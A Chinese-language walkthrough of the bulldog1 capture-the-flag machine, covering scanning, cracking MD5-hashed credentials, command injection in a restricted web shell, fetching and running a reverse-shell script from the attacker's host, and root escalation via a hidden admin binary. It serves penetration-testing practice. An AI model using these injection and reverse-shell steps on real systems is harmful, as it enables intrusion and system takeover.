bulldog1-靶机实战
靶机实战:bulldog1
先要知道对方的IP是否存活,也就是主机发现
1、主机发现
netdiscover -i etho -r IP/网段 属于主动
-i 指定网卡
-r 指定网段
找到目标靶机IP:192.168.232.134
也可以用nmap -sn 扫,看自己心情。
netdiscover -p 被动 不容易被发现,但只能扫到有交互的
2、扫描端口
masscan 只能扫出开放端口而且速度快,存在漏扫,可以多扫几次, nmap 都可以扫
masscan --rate=100000 --ports 0-65535 IP
masscan --rate=每秒多少个数据包 -p/–ports 端口范围 IP地址/IP地址段
目标开放8080、23、80端口
//nmap扫出详细信息
nmap -T4(速度) -sV(版本扫描和开启的服务) -O(操作系统) -p 8080,80,23 IP
3、web渗透(80端口)
访问IP 80端口,发现有两处可以点击
然后点击Bulldog Industries,页面没有任何变化;
点击Public Notice,跳转页面:
发现俩个可点击的,但没有什么有价值的信息。
扫描一下web指纹信息:
再扫一下其它目录:
访问找到的目录:admin/
发现是一个登录页面,看到登录页面一般先尝试使用弱口令进行登录
弱口令登录失败
尝试使用bp抓包进行密码爆破,无果,先pass //这里就不上图了
访问另一个目录:dev/
发现web-shell可以点击,但是要进行身份验证以使用Web-Shell
浏览网页发现一些邮箱,可用于爆破
然后访问robots.txt,也没有发现可用路径,pass
//robots是反爬虫文件,一般重要路径用放在robots中
F12查看刚才网页上面显示的邮箱
好像是MD5加密过的密文
使用MD5进行解密:
发现存在账户:nick密码:bulldog sarah 密码:bulldoglover
尝试登录:
使用nick登录成功:但使用邮箱登录失败
使用sarah登录成功:但使用邮箱登录失败
然后再点击 ’ Web-Shell ',可跳转到如下界面,只能使用给定的命令。
那就是可以命令执行,尝试命令执行:
在webshell上执行 ’ ls & wget http://192.168.232.130 ',命令执行成功。
130为我kali的IP
接下来在Kali的web访问目录下准备shell.py;并执行python -m SimpleHTTPServer 80,搭建简易Web服务(注:web服务在/var/www/html目录下开启,当然也可以直接开启阿帕奇服务 /etc/init.d/apache2 start)
利用命令注入漏洞,在测试机Kali上写一个shell.py脚本,并将其上传到靶机上,使其执行,从而获得一个反弹shell
p=subprocess.call([“/bin/bash”,”-i”]) //连接打开交互式shell(/bin/bash)
python -m SimpleHTTPServer 80 //开一个简易的web服务,文件在哪就在哪打开
报错的话 netstat -pantu kill 80端口
然后在页面执行 ’ pwd & wget http://192.168.232.130/shell.py ’ kali的IP
执行 ’ ls ',可以看到多了shell.py
Kali上进行端口监听,然后在页面执行命令 ‘pwd & python shell.py’,即可成功获得shell
4、提权
uname -a 找系统漏洞去利用 //没有技术含量
查看系统用户 cat /etc/passwd, 发现需要关注的用户有:bulldogadmin、django
发现路径为/home,进入/home
查看当前目录下的所有文件的详细信息,意外发现一个隐藏目录 .hiddenadmindirectory //管理员隐藏目录
进入此目录,存在两个文件,一个note提示,一个可执行文件
strings 查看可执行文件中的字符//cat查看的话是乱码
输入su root 提示要运行一个终端,输入下面python…运行一个终端,提示没有权限,然后执行sudo -i,输入密码,得到root权限
密码上上面红框圈起来的,去掉最后的三个H
提权成功:
也可以使用SSH爆破,具体可自己去试。
